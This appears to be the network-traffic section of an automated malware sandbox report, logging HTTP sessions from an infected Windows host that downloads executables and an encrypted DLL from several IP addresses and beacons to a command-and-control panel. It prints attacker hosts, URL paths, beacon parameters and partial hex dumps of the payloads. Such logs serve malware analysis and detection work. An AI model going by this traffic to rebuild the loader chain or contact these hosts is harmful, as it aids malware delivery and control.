Dec 10, 2024 00:44:20.403618097 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:19 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="dll"; Content-Length: 242176 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}:s(2rp(;&Vrprp(>}(Co(D(E}(F(E(G&>}(Co(D}(F(E(H&">}R} { oo{ "}!{!}{#{op{,{ oo{!oo{*Bsu
Dec 10, 2024 00:44:20.403662920 CET	1236	IN	Data Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32 Data Ascii: (v{#{#owox(+oy{,{ oo+{!oo(2z,{",{"o/(z((X[((X[((X[(q~(-(-(*~to(3to^(
Dec 10, 2024 00:44:20.403683901 CET	1236	IN	Data Raw: 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 04 03 6f 6f 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 32 02 7b 63 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 63 00 00 04 03 Data Ascii: {R2{coR}U{coo{Q"}Q2{cow~{coy}]so2{cosN{cop(2{dosN{dop({VR}Vs({WR}Ws(F{cot
Dec 10, 2024 00:44:20.403700113 CET	1236	IN	Data Raw: 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00 Data Ascii: }q{r"}r(0{s"}s{t"}t{u"}uN((((z,{v,{vo/((5"}xN{o9o<&{\|f}\|{{\|o2{o?*{o9(
Dec 10, 2024 00:44:20.403711081 CET	1236	IN	Data Raw: 0a 02 02 fe 06 5d 01 00 06 73 89 00 00 0a 28 95 00 00 0a 02 16 28 97 00 00 0a 2a e6 02 72 a8 0f 00 70 7d 9f 00 00 04 02 72 a8 0f 00 70 7d a1 00 00 04 02 72 a8 0f 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01 Data Ascii: ]s((rp}rp}rp}rp}(({{{"}{"}{(dt%r2poeoftogz,{,{o/(*rp}rp}sm}
Dec 10, 2024 00:44:20.403723955 CET	1236	IN	Data Raw: 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 1e 02 7b cd 00 00 04 2a 76 03 16 30 0b 72 10 16 00 70 73 41 01 00 0a 7a 02 03 7d cd 00 00 04 02 28 da 01 00 06 2a 1e 02 7b ce 00 00 04 2a 76 02 03 7d ce 00 00 04 02 28 db 00 00 0a 2c 07 02 03 7d d1 00 00 Data Ascii: o/(z{v0rpsAz}({v}(,}({:}({:}(({o{ZX/{o{ZX((J{oooJ{oxo2{
Dec 10, 2024 00:44:20.403767109 CET	1236	IN	Data Raw: 7d 03 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 04 01 00 04 2a 3a 02 03 7d 04 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 05 01 00 04 2a 3a 02 03 7d 05 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 06 01 00 04 2a 3a 02 03 7d 06 01 00 04 02 28 6d 02 00 06 2a 1e Data Ascii: }(m{:}(m{:}(m{:}(m{{:}(m{:}(m{:}(m{:}(m{2{o^{{oo:}(m:
Dec 10, 2024 00:44:20.404228926 CET	1236	IN	Data Raw: 02 7b 2b 01 00 04 03 6f 6f 00 00 0a 2a 32 02 7b 2b 01 00 04 6f f2 00 00 0a 2a 7a 03 2c 13 02 7b 2a 01 00 04 2c 0b 02 7b 2a 01 00 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 0a 16 2a 36 02 28 26 00 00 0a 02 28 dd 02 00 06 2a 52 02 28 26 00 00 0a 03 Data Ascii: {+oo2{+oz,{,{o/(z*6(&(R(&o(z,{-,{-o/(2s}-}6{=ob-{=o\rTp(;&z,{<,{<o/(z:{0ot*:{/ot
Dec 10, 2024 00:44:20.404242992 CET	1236	IN	Data Raw: 00 06 28 39 00 00 0a 2a 56 72 52 1d 00 70 72 96 1d 00 70 72 ac 1d 00 70 28 41 03 00 06 2a 56 72 a8 0f 00 70 80 5d 01 00 04 7e d8 01 00 0a 80 5e 01 00 04 2a 3e 02 fe 15 39 00 00 02 02 03 7d 5f 01 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 Data Ascii: (9VrRprprp(AVrp]~^>9}_(Co(D(E}_(F(E(&>:}d(Co(D}d(F(E(&";><}n{u"}u{v"}v{w"
Dec 10, 2024 00:44:20.404256105 CET	556	IN	Data Raw: 01 00 04 2c 0e 02 7b 99 01 00 04 02 04 6f 23 02 00 0a 2a 04 17 6f 14 04 00 06 2a 8a 02 7b a6 01 00 04 03 6f 28 02 00 0a 2c 12 02 7b a6 01 00 04 03 6f 29 02 00 0a 6f 2c 04 00 06 2a 16 2a 2a 03 75 10 00 00 01 14 fe 03 2a 1e 02 7b aa 01 00 04 2a 22 Data Ascii: ,{o#o{o(,{o)o,**u{"}{J{{(F(uNoKJ(uNoLF(uNoMJ(uNoN{"}{"}{"}
Dec 10, 2024 00:44:20.525547028 CET	1236	IN	Data Raw: 02 03 7d d1 01 00 04 2a 1e 02 7b d2 01 00 04 2a 22 02 03 7d d2 01 00 04 2a 1e 02 7b d3 01 00 04 2a 22 02 03 7d d3 01 00 04 2a 1e 02 7b d4 01 00 04 2a 22 02 03 7d d4 01 00 04 2a 1e 02 7b d5 01 00 04 2a 22 02 03 7d d5 01 00 04 2a 1e 02 7b d6 01 00 Data Ascii: }{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}
Dec 10, 2024 00:44:21.300965071 CET	392	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: s Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:22.026525974 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:21 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="soft"; Content-Length: 1502720 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU ((~-rp(os~~j(r=p~otj(rMp~otj(rp~otj(rp~otj(rp~otj(rp~otj(rp~ot~(Vs(tN(((0f(8Mo9:oo-a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50019	31.41.244.11	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:19.926304102 CET	146	OUT	GET /files/unique2/random.exe HTTP/1.1 Host: 31.41.244.11 If-Modified-Since: Mon, 09 Dec 2024 22:35:01 GMT If-None-Match: "67577095-1db600"
Dec 10, 2024 00:44:21.243957043 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:21 GMT Last-Modified: Mon, 09 Dec 2024 22:35:01 GMT Connection: keep-alive ETag: "67577095-1db600"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50025	185.215.113.16	80	8048	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:21.296830893 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 10, 2024 00:44:22.640840054 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:22 GMT Content-Type: application/octet-stream Content-Length: 2841600 Last-Modified: Mon, 09 Dec 2024 23:14:30 GMT Connection: keep-alive ETag: "675779d6-2b5c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 31 d1 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ,1+`Ui` @ @.rsrc`2@.idata 8@smeyiuht+*:@kkcdotxm +4+@.taggant@+":+@
Dec 10, 2024 00:44:22.640986919 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:44:22.641571999 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:44:22.641681910 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:44:22.641690969 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:44:22.642162085 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:44:22.642232895 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:44:22.642244101 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:44:22.642657042 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:44:22.642769098 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:44:22.762643099 CET	1236	IN	Data Raw: 5c 22 5f 9e 50 e0 1c 4d 37 80 62 94 17 f3 2a b1 7e 50 00 a5 73 c7 46 9a fe fd e7 a1 04 8d 93 ef 11 d6 09 a8 f3 f6 26 cc 38 ec df b5 28 fb 26 bf 73 d0 15 a4 65 6f 1b 53 2d c0 fb 28 6f e2 95 50 7d d1 32 78 36 c0 fe c8 cf f5 4c 28 6f e2 95 c2 7c dd Data Ascii: \"_PM7b~PsF&8(&seoS-(oP}2x6L(o\|2(:\0}g)3rp]v<$SL\|BC-`U_#N02;nt9&/~<G^RCr@js:nVh5r\7Vo&O+cU2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50034	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:23.696783066 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 35 36 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013560001&unit=246122658369
Dec 10, 2024 00:44:25.075377941 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50050	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:26.867260933 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:44:28.277880907 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50067	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:29.927870035 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:44:31.257570982 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50071	80.82.65.70	80	6028	C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:31.698539019 CET	412	OUT	GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:33.026377916 CET	204	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:32 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:33.051704884 CET	386	OUT	GET /dll/key HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:33.546926975 CET	224	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:33 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 21 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73 Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
Dec 10, 2024 00:44:33.558610916 CET	391	OUT	GET /dll/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:34.123414040 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:33 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Length: 97296 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED] Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEPOuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~\|jbK!N7R}T2bsq1L^!\|qD'sLnD@bn%0=bQ1+lQXO\|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
Dec 10, 2024 00:44:34.123502970 CET	1236	IN	Data Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU\|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
Dec 10, 2024 00:44:34.123533010 CET	1236	IN	Data Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd Data Ascii: Dp!lR7+2J^'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: rUz(-dFI?[VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
Dec 10, 2024 00:44:34.123637915 CET	672	IN	Data Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4 Data Ascii: BGpwCy6$h$xZ\|YQ\|5#n&!w@Duhs:\|BFGc3_^MH_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
Dec 10, 2024 00:44:34.123655081 CET	1236	IN	Data Raw: 5a 4e 90 47 87 8d 31 4d 04 f3 b2 8f b5 ec 0b 34 86 f5 8a 59 cc e1 31 db ef 09 6f 5f de 50 ce 55 7c bf 37 d2 26 b8 77 5e 1f 27 ab 58 1f ee ce 9b bf 8d 85 b2 80 b7 5a 06 25 9d b3 27 1c c8 e3 6c 36 e5 a3 7d 22 17 b3 13 00 d6 07 77 28 09 24 fc 89 30 Data Ascii: ZNG1M4Y1o_PU\|7&w^'XZ%'l6}"w($0_g8^T1bf4n\vl)OCoKaC#/\|fZyhc7LY=T(b8be@yo~YN_ozIe_*%BH1uObUR\|aXyt
